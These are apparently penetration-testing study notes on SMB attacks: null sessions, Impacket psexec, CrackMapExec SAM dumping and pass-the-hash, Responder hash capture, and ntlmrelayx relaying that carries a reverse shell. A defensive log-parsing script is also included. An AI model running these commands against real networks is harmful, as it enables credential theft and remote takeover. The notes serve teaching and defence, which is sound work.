139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds

SMB typically runs on TCP port 445; the older NetBIOS-based transport uses TCP port 139 together with UDP ports 137 and 138.

Misconfigurations

SMB can be configured not to require authentication, a configuration often called a null session.

Anonymous Authentication

We use -N in smbclient to authenticate with a null (empty) password, and -L to list the shares.

smbclient -N -L //<ip>

Remote Code Execution (RCE) via SMB

We can use Impacket's psexec, smbexec, or atexec tools.

Impacket

impacket-psexec <username>:'<password>'@<ip>

Enumerating Logged-on Users

We can use CrackMapExec to enumerate logged-on users on all machines in the same network.

crackmapexec smb <ip or subnet> -u <username> -p '<password>' --loggedon-users

Extract Hashes from SAM Database

We can even use SMB to extract hashes from the SAM database using CrackMapExec.

crackmapexec smb <ip> -u <username> -p '<password>' --sam

and then use the obtained hash for Pass-the-Hash (PtH) with CrackMapExec itself.

crackmapexec smb <ip> -u <username> -H <hash>

Forced Authentication Attacks

We can also abuse the SMB protocol by creating a fake SMB server to capture users' NetNTLMv1/v2 hashes. The most common tool for this is Responder.

responder -I <interface name>

First we create a fake SMB server using Responder's default configuration.

When a user or a system needs to resolve a hostname to an IP address (Name Resolution, NR), the machine goes through a series of steps. On Windows, the procedure is roughly as follows:

  • The IP address of the file share's hostname is required.
  • The local hosts file (C:\Windows\System32\Drivers\etc\hosts) is checked for a suitable record.
  • If no record is found, the machine checks the local DNS cache, which holds recently resolved names.
  • If there is no local DNS record, a query is sent to the configured DNS server.
  • If all else fails, the machine issues a multicast query (LLMNR/NBT-NS), asking the other machines on the network for the file share's IP address. This last step is the one a fake server such as Responder answers.

The captured hashes can be cracked using hashcat mode 5600 (NetNTLMv2).
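As an added defender-side example (not part of the original notes), the following Python script parses constructed Windows Security 4624 logon records and flags the two traces the techniques above leave in the logs: network logons by ANONYMOUS LOGON (null sessions) and network logons negotiated with NTLMv1, the weakest variant for a fake server to capture and crack. The field names are the real 4624 ones; the one-line-per-event layout, accounts and addresses are constructed for the example.

```python
import re

# Constructed sample: five Windows Security 4624 (successful logon) events, one per
# line, reduced to the fields used here. Real 4624 events are multi-line; the field
# names are the real ones, the accounts and addresses are made up for the example.
SAMPLE_EVENTS = """\
EventID: 4624; Logon Type: 3; Account Name: ANONYMOUS LOGON; Account Domain: NT AUTHORITY; Authentication Package: NTLM; Package Name (NTLM only): -; Source Network Address: 10.0.0.55
EventID: 4624; Logon Type: 3; Account Name: jdoe; Account Domain: CORP; Authentication Package: NTLM; Package Name (NTLM only): NTLM V1; Source Network Address: 10.0.0.77
EventID: 4624; Logon Type: 3; Account Name: jdoe; Account Domain: CORP; Authentication Package: NTLM; Package Name (NTLM only): NTLM V2; Source Network Address: 10.0.0.20
EventID: 4624; Logon Type: 2; Account Name: admin; Account Domain: CORP; Authentication Package: Kerberos; Package Name (NTLM only): -; Source Network Address: 127.0.0.1
EventID: 4624; Logon Type: 3; Account Name: svc-backup; Account Domain: CORP; Authentication Package: Kerberos; Package Name (NTLM only): -; Source Network Address: 10.0.0.30
"""

FIELD_RE = re.compile(r"([^;:]+):\s*([^;]*)")


def parse_event(line: str) -> dict:
    """Split one 'Key: value; Key: value' record into a dict (values hold no ';' or ':')."""
    return {k.strip(): v.strip() for k, v in FIELD_RE.findall(line)}


def classify(event: dict) -> list:
    """Return the findings raised by one event; an empty list means nothing to flag."""
    findings = []
    if event.get("EventID") != "4624" or event.get("Logon Type") != "3":
        return findings  # only successful network logons (SMB, RPC, ...) matter here
    # Null session: an SMB session set up without credentials is logged under the
    # built-in ANONYMOUS LOGON account. Mitigation: RestrictAnonymous /
    # RestrictNullSessAccess. Some DC and browser traffic is legitimately anonymous,
    # so baseline a host before alerting on this.
    if event.get("Account Name") == "ANONYMOUS LOGON":
        findings.append("null-session")
    # A client still negotiating NTLMv1 hands a poisoned server the weakest variant
    # to capture and crack. Mitigation: LmCompatibilityLevel=5 (refuse LM and NTLMv1).
    if event.get("Package Name (NTLM only)") == "NTLM V1":
        findings.append("ntlmv1")
    return findings


def audit(log_text: str) -> dict:
    """Map each finding to the source addresses that produced it."""
    report = {"null-session": [], "ntlmv1": []}
    for line in log_text.splitlines():
        if line.strip():
            event = parse_event(line)
            for tag in classify(event):
                report[tag].append(event.get("Source Network Address", "?"))
    return report


if __name__ == "__main__":
    for tag, sources in audit(SAMPLE_EVENTS).items():
        print(f"{tag}: {sources}")
```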

Note

If we aren't able to crack the NTLMv2 hash, we can potentially relay the captured authentication using Impacket's ntlmrelayx. Here's how:

First, we need to set SMB to Off in the Responder configuration file (/etc/responder/Responder.conf) so that Responder no longer answers SMB itself.

Then we execute ntlmrelayx against the target. Note that relaying only works against hosts that do not require SMB signing, which is why enforcing signing is the standard mitigation.

impacket-ntlmrelayx --no-http-server -smb2support -t <target_ip>

We can create a PowerShell reverse shell using https://www.revshells.com/, setting our machine's IP address and port and choosing the "PowerShell #3 (Base64)" option; the resulting command is then passed to ntlmrelayx with -c.

impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.220.146 -c 'cmd'